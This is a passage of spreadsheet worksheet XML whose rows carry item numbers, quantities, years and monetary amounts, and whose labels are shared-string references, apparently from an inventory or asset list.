        <v>507</v>
      </c>
      <c r="H448" s="16">
        <v>1</v>
      </c>
      <c r="J448" s="131"/>
      <c r="K448" s="99">
        <v>240</v>
      </c>
      <c r="L448" s="9" t="s">
        <v>3727</v>
      </c>
    </row>
    <row r="449" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A449" s="93"/>
      <c r="B449" s="11">
        <v>430</v>
      </c>
      <c r="C449" s="11"/>
      <c r="D449" s="9" t="s">
        <v>3810</v>
      </c>
      <c r="E449" s="9"/>
      <c r="F449" s="9"/>
      <c r="G449" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H449" s="16">
        <v>1</v>
      </c>
      <c r="J449" s="131"/>
      <c r="K449" s="99">
        <v>1200</v>
      </c>
      <c r="L449" s="9" t="s">
        <v>3727</v>
      </c>
    </row>
    <row r="450" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A450" s="93"/>
      <c r="B450" s="11">
        <v>431</v>
      </c>
      <c r="C450" s="11"/>
      <c r="D450" s="9" t="s">
        <v>3811</v>
      </c>
      <c r="E450" s="9"/>
      <c r="F450" s="9"/>
      <c r="G450" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H450" s="16">
        <v>1</v>
      </c>
      <c r="J450" s="131"/>
      <c r="K450" s="99">
        <v>1200</v>
      </c>
      <c r="L450" s="9" t="s">
        <v>3727</v>
      </c>
    </row>
    <row r="451" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A451" s="93"/>
      <c r="B451" s="11">
        <v>432</v>
      </c>
      <c r="C451" s="11"/>
      <c r="D451" s="9" t="s">
        <v>3155</v>
      </c>
      <c r="E451" s="9" t="s">
        <v>3812</v>
      </c>
      <c r="F451" s="9"/>
      <c r="G451" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H451" s="16">
        <v>2</v>
      </c>
      <c r="I451" s="88">
        <v>2003</v>
      </c>
      <c r="J451" s="9"/>
      <c r="K451" s="99">
        <v>5200</v>
      </c>
      <c r="L451" s="9"/>
    </row>
    <row r="452" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A452" s="93"/>
      <c r="B452" s="11">
        <v>433</v>
      </c>
      <c r="C452" s="11"/>
      <c r="D452" s="9" t="s">
        <v>3813</v>
      </c>
      <c r="E452" s="9" t="s">
        <v>3814</v>
      </c>
      <c r="F452" s="9"/>
      <c r="G452" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H452" s="16">
        <v>1</v>
      </c>
      <c r="I452" s="88">
        <v>2009</v>
      </c>
      <c r="J452" s="9"/>
      <c r="K452" s="99">
        <v>5600</v>
      </c>
      <c r="L452" s="9"/>
    </row>
    <row r="453" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A453" s="93"/>
      <c r="B453" s="127" t="s">
        <v>2113</v>
      </c>
      <c r="C453" s="128"/>
      <c r="D453" s="129"/>
      <c r="E453" s="9"/>
      <c r="F453" s="9"/>
      <c r="G453" s="16"/>
      <c r="H453" s="16"/>
      <c r="J453" s="9"/>
      <c r="K453" s="99">
        <v>0</v>
      </c>
      <c r="L453" s="9"/>
    </row>
    <row r="454" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A454" s="93"/>
      <c r="B454" s="11">
        <v>434</v>
      </c>
      <c r="C454" s="11"/>
      <c r="D454" s="9" t="s">
        <v>3815</v>
      </c>
      <c r="E454" s="9" t="s">
        <v>3786</v>
      </c>
      <c r="F454" s="9"/>
      <c r="G454" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H454" s="16">
        <v>1</v>
      </c>
      <c r="J454" s="9"/>
      <c r="K454" s="99">
        <v>600</v>
      </c>
      <c r="L454" s="9"/>
    </row>
    <row r="455" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A455" s="93"/>
      <c r="B455" s="11">
        <v>435</v>
      </c>
      <c r="C455" s="11"/>
      <c r="D455" s="9" t="s">
        <v>2892</v>
      </c>
      <c r="E455" s="9" t="s">
        <v>3816</v>
      </c>
      <c r="F455" s="9"/>
      <c r="G455" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H455" s="16">
        <v>1</v>
      </c>
      <c r="J455" s="9"/>
      <c r="K455" s="99">
        <v>7200</v>
      </c>
      <c r="L455" s="9"/>
    </row>
    <row r="456" customHeight="1" spans="1:12">
      <c r="A456" s="93"/>
      <c r="B456" s="11">
        <v>436</v>
      </c>
      <c r="C456" s="11"/>
      <c r="D456" s="9" t="s">
        <v>3817</v>
      </c>
      <c r="E456" s="9" t="s">
        <v>3818</v>
      </c>
      <c r="F456" s="9" t="s">
        <v>3819</v>
      </c>
      <c r="G456" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H456" s="16">
        <v>1</v>
      </c>
      <c r="I456" s="88">
        <v>2007</v>
      </c>
      <c r="K456" s="99">
        <v>12000</v>
      </c>
      <c r="L456" s="9"/>
    </row>
    <row r="457" customHeight="1" spans="1:12">
      <c r="A457" s="93"/>
      <c r="B457" s="11">
        <v>437</v>
      </c>
      <c r="C457" s="11"/>
      <c r="D457" s="9" t="s">
        <v>3820</v>
      </c>
      <c r="G457" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H457" s="16">
        <v>1</v>
      </c>
      <c r="I457" s="88"/>
      <c r="K457" s="99">
        <v>24000</v>
      </c>
      <c r="L457" s="9"/>
    </row>
    <row r="458" customHeight="1" spans="1:12">
      <c r="A458" s="93"/>
      <c r="B458" s="11">
        <v>438</v>
      </c>
      <c r="C458" s="11"/>
      <c r="D458" s="9" t="s">
        <v>3710</v>
      </c>
      <c r="E458" s="9" t="s">
        <v>3821</v>
      </c>
      <c r="G458" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H458" s="16">
        <v>1</v>
      </c>
      <c r="I458" s="88"/>
      <c r="K458" s="99">
        <v>2400</v>
      </c>
      <c r="L458" s="9"/>
    </row>
    <row r="459" customHeight="1" spans="1:12">
      <c r="A459" s="93"/>
      <c r="B459" s="11">
        <v>439</v>
      </c>
      <c r="C459" s="11"/>
      <c r="D459" s="9" t="s">
        <v>3822</v>
      </c>
      <c r="E459" s="9" t="s">
        <v>3739</v>
      </c>
      <c r="G459" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H459" s="16">
        <v>1</v>
      </c>
      <c r="I459" s="88"/>
      <c r="K459" s="99">
        <v>600</v>
      </c>
      <c r="L459" s="9"/>
    </row>
    <row r="460" customHeight="1" spans="1:12">
      <c r="A460" s="93"/>
      <c r="B460" s="127" t="s">
        <v>3823</v>
      </c>
      <c r="C460" s="128"/>
      <c r="D460" s="129"/>
      <c r="E460" s="10"/>
      <c r="G460" s="88"/>
      <c r="H460" s="88"/>
      <c r="I460" s="88"/>
      <c r="J460" s="130"/>
      <c r="K460" s="99">
        <v>0</v>
      </c>
      <c r="L460" s="9"/>
    </row>
    <row r="461" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A461" s="93"/>
      <c r="B461" s="11">
        <v>440</v>
      </c>
      <c r="C461" s="11"/>
      <c r="D461" s="9" t="s">
        <v>3824</v>
      </c>
      <c r="E461" s="9" t="s">
        <v>3825</v>
      </c>
      <c r="F461" s="9"/>
      <c r="G461" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H461" s="16">
        <v>1</v>
      </c>
      <c r="I461" s="88">
        <v>2003</v>
      </c>
      <c r="J461" s="131"/>
      <c r="K461" s="99">
        <v>2600</v>
      </c>
      <c r="L461" s="9"/>
    </row>
    <row r="462" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A462" s="93"/>
      <c r="B462" s="11">
        <v>441</v>
      </c>
      <c r="C462" s="11"/>
      <c r="D462" s="9" t="s">
        <v>2892</v>
      </c>
      <c r="E462" s="9" t="s">
        <v>3826</v>
      </c>
      <c r="F462" s="9"/>
      <c r="G462" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H462" s="16">
        <v>1</v>
      </c>
      <c r="J462" s="131"/>
      <c r="K462" s="99">
        <v>6000</v>
      </c>
      <c r="L462" s="9"/>
    </row>
    <row r="463" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A463" s="93"/>
      <c r="B463" s="11">
        <v>442</v>
      </c>
      <c r="C463" s="11"/>
      <c r="D463" s="9" t="s">
        <v>3827</v>
      </c>
      <c r="E463" s="9" t="s">
        <v>3828</v>
      </c>
      <c r="F463" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G463" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H463" s="16">
        <v>1</v>
      </c>
      <c r="J463" s="131"/>
      <c r="K463" s="99">
        <v>1200</v>
      </c>
      <c r="L463" s="9"/>
    </row>
    <row r="464" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A464" s="93"/>
      <c r="B464" s="11">
        <v>443</v>
      </c>
      <c r="C464" s="11"/>
      <c r="D464" s="9" t="s">
        <v>3829</v>
      </c>
      <c r="E464" s="9" t="s">
        <v>3797</v>
      </c>
      <c r="F464" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G464" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H464" s="16">
        <v>1</v>
      </c>
      <c r="J464" s="9"/>
      <c r="K464" s="99">
        <v>240</v>
      </c>
      <c r="L464" s="9"/>
    </row>
    <row r="465" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A465" s="93"/>
      <c r="B465" s="11">
        <v>444</v>
      </c>
      <c r="C465" s="11"/>
      <c r="D465" s="9" t="s">
        <v>3829</v>
      </c>
      <c r="E465" s="9" t="s">
        <v>3830</v>
      </c>
      <c r="F465" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G465" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H465" s="16">
        <v>1</v>
      </c>
      <c r="J465" s="9"/>
      <c r="K465" s="99">
        <v>1200</v>
      </c>
      <c r="L465" s="9"/>
    </row>
    <row r="466" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A466" s="93"/>
      <c r="B466" s="11">
        <v>445</v>
      </c>
      <c r="C466" s="11"/>
      <c r="D466" s="9" t="s">
        <v>3829</v>
      </c>
      <c r="E466" s="9" t="s">
        <v>3831</v>
      </c>
      <c r="F466" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G466" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H466" s="16">
        <v>1</v>
      </c>
      <c r="J466" s="9"/>
      <c r="K466" s="99">
        <v>360</v>
      </c>
      <c r="L466" s="9"/>
    </row>
    <row r="467" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A467" s="93"/>
      <c r="B467" s="11">
        <v>446</v>
      </c>
      <c r="C467" s="11"/>
      <c r="D467" s="9" t="s">
        <v>3829</v>
      </c>
      <c r="E467" s="9" t="s">
        <v>3832</v>
      </c>
      <c r="F467" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G467" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H467" s="16">
        <v>1</v>
      </c>
      <c r="J467" s="9"/>
      <c r="K467" s="99">
        <v>240</v>
      </c>
      <c r="L467" s="9"/>
    </row>
    <row r="468" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A468" s="93"/>
      <c r="B468" s="11">
        <v>447</v>
      </c>
      <c r="C468" s="11"/>
      <c r="D468" s="9" t="s">
        <v>3833</v>
      </c>
      <c r="E468" s="9" t="s">
        <v>3834</v>
      </c>
      <c r="F468" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G468" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H468" s="16">
        <v>1</v>
      </c>
      <c r="J468" s="9"/>
      <c r="K468" s="99">
        <v>2400</v>
      </c>
      <c r="L468" s="9"/>
    </row>
    <row r="469" customHeight="1" spans="1:12">
      <c r="A469" s="93"/>
      <c r="B469" s="11">
        <v>448</v>
      </c>
      <c r="C469" s="11"/>
      <c r="D469" s="9" t="s">
        <v>3833</v>
      </c>
      <c r="E469" s="9" t="s">
        <v>3835</v>
      </c>
      <c r="F469" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G469" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H469" s="16">
        <v>1</v>
      </c>
      <c r="I469" s="88"/>
      <c r="K469" s="99">
        <v>1200</v>
      </c>
      <c r="L469" s="9"/>
    </row>
    <row r="470" customHeight="1" spans="1:12">
      <c r="A470" s="93"/>
      <c r="B470" s="11">
        <v>449</v>
      </c>
      <c r="C470" s="11"/>
      <c r="D470" s="9" t="s">
        <v>3833</v>
      </c>
      <c r="E470" s="9" t="s">
        <v>3755</v>
      </c>
      <c r="F470" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G470" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H470" s="16">
        <v>1</v>
      </c>
      <c r="I470" s="88"/>
      <c r="K470" s="99">
        <v>1200</v>
      </c>
      <c r="L470" s="9"/>
    </row>
    <row r="471" customHeight="1" spans="1:12">
      <c r="A471" s="93"/>
      <c r="B471" s="11">
        <v>450</v>
      </c>
      <c r="C471" s="11"/>
      <c r="D471" s="9" t="s">
        <v>3836</v>
      </c>
      <c r="E471" s="9" t="s">
        <v>3837</v>
      </c>
      <c r="G471" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H471" s="16">
        <v>1</v>
      </c>
      <c r="I471" s="88"/>
      <c r="K471" s="99">
        <v>600</v>
      </c>
      <c r="L471" s="9"/>
    </row>
    <row r="472" customHeight="1" spans="1:12">
      <c r="A472" s="93"/>
      <c r="B472" s="11">
        <v>451</v>
      </c>
      <c r="C472" s="11"/>
      <c r="D472" s="9" t="s">
        <v>3838</v>
      </c>
      <c r="E472" s="9" t="s">
        <v>3767</v>
      </c>
      <c r="G472" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H472" s="16">
        <v>1</v>
      </c>
      <c r="I472" s="88">
        <v>2007</v>
      </c>
      <c r="K472" s="99">
        <v>7200</v>
      </c>
      <c r="L472" s="9"/>
    </row>
    <row r="473" customHeight="1" spans="1:12">
      <c r="A473" s="93"/>
      <c r="B473" s="11">
        <v>452</v>
      </c>
      <c r="C473" s="11"/>
      <c r="D473" s="10" t="s">
        <v>3839</v>
      </c>
      <c r="E473" s="9" t="s">
        <v>3840</v>
      </c>
      <c r="F473" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G473" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H473" s="88">
        <v>1</v>
      </c>
      <c r="I473" s="88"/>
      <c r="J473" s="130"/>
      <c r="K473" s="99">
        <v>600</v>
      </c>
      <c r="L473" s="9"/>
    </row>
    <row r="474" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A474" s="93"/>
      <c r="B474" s="11">
        <v>453</v>
      </c>
      <c r="C474" s="11"/>
      <c r="D474" s="9" t="s">
        <v>3841</v>
      </c>
      <c r="E474" s="9" t="s">
        <v>3837</v>
      </c>
      <c r="F474" s="9"/>
      <c r="G474" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H474" s="16">
        <v>1</v>
      </c>
      <c r="J474" s="131"/>
      <c r="K474" s="99">
        <v>600</v>
      </c>
      <c r="L474" s="9"/>
    </row>
    <row r="475" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A475" s="93"/>
      <c r="B475" s="11">
        <v>454</v>
      </c>
      <c r="C475" s="11"/>
      <c r="D475" s="9" t="s">
        <v>3842</v>
      </c>
      <c r="E475" s="9" t="s">
        <v>3843</v>
      </c>
      <c r="F475" s="9" t="s">
        <v>2160</v>
      </c>
      <c r="G475" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H475" s="16">
        <v>1</v>
      </c>
      <c r="I475" s="88">
        <v>2002</v>
      </c>
      <c r="J475" s="131"/>
      <c r="K475" s="99">
        <v>40</v>
      </c>
      <c r="L475" s="9"/>
    </row>
    <row r="476" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A476" s="93"/>
      <c r="B476" s="11">
        <v>455</v>
      </c>
      <c r="C476" s="11"/>
      <c r="D476" s="9" t="s">
        <v>3844</v>
      </c>
      <c r="E476" s="9"/>
      <c r="F476" s="9"/>
      <c r="G476" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H476" s="16">
        <v>1</v>
      </c>
      <c r="J476" s="131"/>
      <c r="K476" s="99">
        <v>2880</v>
      </c>
      <c r="L476" s="9"/>
    </row>
    <row r="477" s="124" customFormat="1" customHeight="1" spans="1:12">
      <c r="A477" s="93"/>
      <c r="B477" s="11">
        <v>456</v>
      </c>
      <c r="C477" s="11"/>
      <c r="D477" s="9" t="s">
        <v>3845</v>
      </c>
      <c r="E477" s="9" t="s">
        <v>3846</v>
      </c>
      <c r="F477" s="9"/>
      <c r="G477" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H477" s="16">
        <v>4</v>
      </c>
      <c r="I477" s="88">
        <v>1989</v>
      </c>
      <c r="J477" s="9"/>
      <c r="K477" s="99">
        <v>192000</v>
      </c>
      <c r="L477" s="9"/>
    </row>
    <row r="478" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A478" s="93"/>
      <c r="B478" s="11">
        <v>457</v>
      </c>
      <c r="C478" s="11"/>
      <c r="D478" s="9" t="s">
        <v>487</v>
      </c>
      <c r="E478" s="9" t="s">
        <v>3847</v>
      </c>
      <c r="F478" s="9" t="s">
        <v>2395</v>
      </c>
      <c r="G478" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H478" s="16">
        <v>4</v>
      </c>
      <c r="J478" s="9"/>
      <c r="K478" s="99">
        <v>4800</v>
      </c>
      <c r="L478" s="9"/>
    </row>
    <row r="479" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A479" s="93"/>
      <c r="B479" s="11">
        <v>458</v>
      </c>
      <c r="C479" s="11"/>
      <c r="D479" s="9" t="s">
        <v>3848</v>
      </c>
      <c r="E479" s="9" t="s">
        <v>3849</v>
      </c>
      <c r="F479" s="9" t="s">
        <v>3850</v>
      </c>
      <c r="G479" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H479" s="16">
        <v>1</v>
      </c>
      <c r="I479" s="88">
        <v>1998</v>
      </c>
      <c r="J479" s="9"/>
      <c r="K479" s="99">
        <v>32000</v>
      </c>
      <c r="L479" s="9" t="s">
        <v>3727</v>
      </c>
    </row>
    <row r="480" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A480" s="93"/>
      <c r="B480" s="11">
        <v>459</v>
      </c>
      <c r="C480" s="11"/>
      <c r="D480" s="9" t="s">
        <v>3851</v>
      </c>
      <c r="E480" s="9" t="s">
        <v>3852</v>
      </c>
      <c r="F480" s="9"/>
      <c r="G480" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H480" s="16">
        <v>1</v>
      </c>
      <c r="J480" s="9"/>
      <c r="K480" s="99">
        <v>800</v>
      </c>
      <c r="L480" s="9" t="s">
        <v>3727</v>
      </c>
    </row>
    <row r="481" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A481" s="93"/>
      <c r="B481" s="11">
        <v>460</v>
      </c>
      <c r="C481" s="11"/>
      <c r="D481" s="9" t="s">
        <v>3853</v>
      </c>
      <c r="E481" s="9"/>
      <c r="F481" s="9"/>
      <c r="G481" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H481" s="16">
        <v>2</v>
      </c>
      <c r="J481" s="9"/>
      <c r="K481" s="99">
        <v>3200</v>
      </c>
      <c r="L481" s="9"/>
    </row>
    <row r="482" customHeight="1" spans="1:12">
      <c r="A482" s="93"/>
      <c r="B482" s="11">
        <v>461</v>
      </c>
      <c r="C482" s="11"/>
      <c r="D482" s="9" t="s">
        <v>3854</v>
      </c>
      <c r="G482" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H482" s="16">
        <v>2</v>
      </c>
      <c r="I482" s="88"/>
      <c r="K482" s="99">
        <v>3200</v>
      </c>
      <c r="L482" s="9"/>
    </row>
    <row r="483" customHeight="1" spans="1:12">
      <c r="A483" s="93"/>
      <c r="B483" s="11">
        <v>462</v>
      </c>
      <c r="C483" s="11"/>
      <c r="D483" s="9" t="s">
        <v>3855</v>
      </c>
      <c r="G483" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H483" s="16">
        <v>1</v>
      </c>
      <c r="I483" s="88"/>
      <c r="K483" s="99">
        <v>1600</v>
      </c>
      <c r="L483" s="9"/>
    </row>
    <row r="484" customHeight="1" spans="1:12">
      <c r="A484" s="93"/>
      <c r="B484" s="11">
        <v>463</v>
      </c>
      <c r="C484" s="11"/>
      <c r="D484" s="9" t="s">
        <v>3856</v>
      </c>
      <c r="G484" s="16" t="s">
        <v>3484</v>
      </c>
      <c r="H484" s="16">
        <v>3</v>
      </c>
      <c r="I484" s="88"/>
      <c r="K484" s="99">
        <v>4800</v>
      </c>
      <c r="L484" s="9"/>
    </row>
    <row r="485" customHeight="1" spans="1:12">
      <c r="A485" s="93"/>
      <c r="B485" s="11">
        <v>464</v>
      </c>
      <c r="C485" s="11"/>
      <c r="D485" s="9" t="s">
        <v>3515</v>
      </c>
      <c r="E485" s="9" t="s">
        <v>3857</v>
      </c>
      <c r="G485" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H485" s="16">
        <v>1</v>
      </c>
      <c r="I485" s="88"/>
      <c r="K485" s="99">
        <v>24000</v>
      </c>
      <c r="L485" s="9"/>
    </row>
    <row r="486" customHeight="1" spans="1:12">
      <c r="A486" s="93"/>
      <c r="B486" s="11">
        <v>465</v>
      </c>
      <c r="C486" s="11"/>
      <c r="D486" s="20" t="s">
        <v>3824</v>
      </c>
      <c r="E486" s="9" t="s">
        <v>3858</v>
      </c>
      <c r="G486" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H486" s="16">
        <v>1</v>
      </c>
      <c r="I486" s="88"/>
      <c r="K486" s="99">
        <v>24000</v>
      </c>
      <c r="L486" s="9"/>
    </row>
    <row r="487" customHeight="1" spans="1:12">
      <c r="A487" s="93"/>
      <c r="B487" s="127" t="s">
        <v>3859</v>
      </c>
      <c r="C487" s="128"/>
      <c r="D487" s="129"/>
      <c r="E487" s="10"/>
      <c r="G487" s="88"/>
      <c r="H487" s="88"/>
      <c r="I487" s="88"/>
      <c r="J487" s="130"/>
      <c r="K487" s="99">
        <v>0</v>
      </c>
      <c r="L487" s="9"/>
    </row>
    <row r="488" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A488" s="93"/>
      <c r="B488" s="11">
        <v>466</v>
      </c>
      <c r="C488" s="11"/>
      <c r="D488" s="9" t="s">
        <v>3836</v>
      </c>
      <c r="E488" s="9" t="s">
        <v>3860</v>
      </c>
      <c r="F488" s="9"/>
      <c r="G488" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H488" s="16">
        <v>1</v>
      </c>
      <c r="J488" s="131"/>
      <c r="K488" s="99">
        <v>600</v>
      </c>
      <c r="L488" s="9"/>
    </row>
    <row r="489" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A489" s="93"/>
      <c r="B489" s="11">
        <v>467</v>
      </c>
      <c r="C489" s="11"/>
      <c r="D489" s="9" t="s">
        <v>3861</v>
      </c>
      <c r="E489" s="9"/>
      <c r="F489" s="9"/>
      <c r="G489" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H489" s="16">
        <v>1</v>
      </c>
      <c r="J489" s="131"/>
      <c r="K489" s="99">
        <v>800</v>
      </c>
      <c r="L489" s="18" t="s">
        <v>3862</v>
      </c>
    </row>
    <row r="490" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A490" s="93"/>
      <c r="B490" s="11">
        <v>468</v>
      </c>
      <c r="C490" s="11"/>
      <c r="D490" s="9" t="s">
        <v>3863</v>
      </c>
      <c r="E490" s="9" t="s">
        <v>3864</v>
      </c>
      <c r="F490" s="9"/>
      <c r="G490" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H490" s="16">
        <v>1</v>
      </c>
      <c r="J490" s="131"/>
      <c r="K490" s="99">
        <v>1600</v>
      </c>
      <c r="L490" s="9"/>
    </row>
    <row r="491" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A491" s="93"/>
      <c r="B491" s="11">
        <v>469</v>
      </c>
      <c r="C491" s="11"/>
      <c r="D491" s="9" t="s">
        <v>3865</v>
      </c>
      <c r="E491" s="9" t="s">
        <v>3866</v>
      </c>
      <c r="F491" s="9"/>
      <c r="G491" s="16" t="s">
        <v>3867</v>
      </c>
      <c r="H491" s="16">
        <v>2</v>
      </c>
      <c r="J491" s="9"/>
      <c r="K491" s="99">
        <v>9600</v>
      </c>
      <c r="L491" s="9"/>
    </row>
    <row r="492" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A492" s="93"/>
      <c r="B492" s="11">
        <v>470</v>
      </c>
      <c r="C492" s="11"/>
      <c r="D492" s="9" t="s">
        <v>3868</v>
      </c>
      <c r="E492" s="9" t="s">
        <v>3869</v>
      </c>
      <c r="F492" s="9"/>
      <c r="G492" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H492" s="16">
        <v>1</v>
      </c>
      <c r="J492" s="9"/>
      <c r="K492" s="99">
        <v>4800</v>
      </c>
      <c r="L492" s="9"/>
    </row>
    <row r="493" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A493" s="93"/>
      <c r="B493" s="11">
        <v>471</v>
      </c>
      <c r="C493" s="11"/>
      <c r="D493" s="9" t="s">
        <v>3870</v>
      </c>
      <c r="E493" s="9" t="s">
        <v>3831</v>
      </c>
      <c r="F493" s="9"/>
      <c r="G493" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H493" s="16">
        <v>1</v>
      </c>
      <c r="J493" s="9"/>
      <c r="K493" s="99">
        <v>1600</v>
      </c>
      <c r="L493" s="9"/>
    </row>
    <row r="494" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A494" s="93"/>
      <c r="B494" s="127" t="s">
        <v>2903</v>
      </c>
      <c r="C494" s="128"/>
      <c r="D494" s="129"/>
      <c r="E494" s="132"/>
      <c r="F494" s="9"/>
      <c r="G494" s="16"/>
      <c r="H494" s="16"/>
      <c r="J494" s="9"/>
      <c r="K494" s="99">
        <v>0</v>
      </c>
      <c r="L494" s="9"/>
    </row>
    <row r="495" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A495" s="93"/>
      <c r="B495" s="11">
        <v>472</v>
      </c>
      <c r="C495" s="11"/>
      <c r="D495" s="9" t="s">
        <v>3871</v>
      </c>
      <c r="E495" s="9" t="s">
        <v>3872</v>
      </c>
      <c r="F495" s="9"/>
      <c r="G495" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H495" s="16">
        <v>1</v>
      </c>
      <c r="J495" s="9"/>
      <c r="K495" s="99">
        <v>320</v>
      </c>
      <c r="L495" s="9"/>
    </row>
    <row r="496" customHeight="1" spans="1:12">
      <c r="A496" s="93"/>
      <c r="B496" s="11">
        <v>473</v>
      </c>
      <c r="C496" s="11"/>
      <c r="D496" s="9" t="s">
        <v>3807</v>
      </c>
      <c r="E496" s="9" t="s">
        <v>476</v>
      </c>
      <c r="G496" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H496" s="16">
        <v>1</v>
      </c>
      <c r="I496" s="88"/>
      <c r="K496" s="99">
        <v>160</v>
      </c>
      <c r="L496" s="9"/>
    </row>
    <row r="497" customHeight="1" spans="1:12">
      <c r="A497" s="93"/>
      <c r="B497" s="11">
        <v>474</v>
      </c>
      <c r="C497" s="11"/>
      <c r="D497" s="9" t="s">
        <v>3873</v>
      </c>
      <c r="G497" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H497" s="16">
        <v>1</v>
      </c>
      <c r="I497" s="88"/>
      <c r="K497" s="99">
        <v>800</v>
      </c>
      <c r="L497" s="9"/>
    </row>
    <row r="498" customHeight="1" spans="1:12">
      <c r="A498" s="93"/>
      <c r="B498" s="11">
        <v>475</v>
      </c>
      <c r="C498" s="11"/>
      <c r="D498" s="9" t="s">
        <v>3874</v>
      </c>
      <c r="E498" s="9" t="s">
        <v>3875</v>
      </c>
      <c r="G498" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H498" s="16">
        <v>1</v>
      </c>
      <c r="I498" s="88"/>
      <c r="K498" s="99">
        <v>360</v>
      </c>
      <c r="L498" s="9"/>
    </row>
    <row r="499" customHeight="1" spans="1:12">
      <c r="A499" s="93"/>
      <c r="B499" s="11">
        <v>476</v>
      </c>
      <c r="C499" s="11"/>
      <c r="D499" s="9" t="s">
        <v>3876</v>
      </c>
      <c r="G499" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H499" s="16">
        <v>2</v>
      </c>
      <c r="I499" s="88"/>
      <c r="K499" s="99">
        <v>960</v>
      </c>
      <c r="L499" s="9"/>
    </row>
    <row r="500" customHeight="1" spans="1:12">
      <c r="A500" s="93"/>
      <c r="B500" s="11">
        <v>477</v>
      </c>
      <c r="C500" s="11"/>
      <c r="D500" s="10" t="s">
        <v>331</v>
      </c>
      <c r="E500" s="10" t="s">
        <v>3877</v>
      </c>
      <c r="G500" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H500" s="88">
        <v>1</v>
      </c>
      <c r="I500" s="88"/>
      <c r="J500" s="130"/>
      <c r="K500" s="99">
        <v>4800</v>
      </c>
      <c r="L500" s="9"/>
    </row>
    <row r="501" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A501" s="93"/>
      <c r="B501" s="11">
        <v>478</v>
      </c>
      <c r="C501" s="11"/>
      <c r="D501" s="9" t="s">
        <v>3863</v>
      </c>
      <c r="E501" s="9" t="s">
        <v>3869</v>
      </c>
      <c r="F501" s="9"/>
      <c r="G501" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H501" s="16">
        <v>1</v>
      </c>
      <c r="J501" s="131"/>
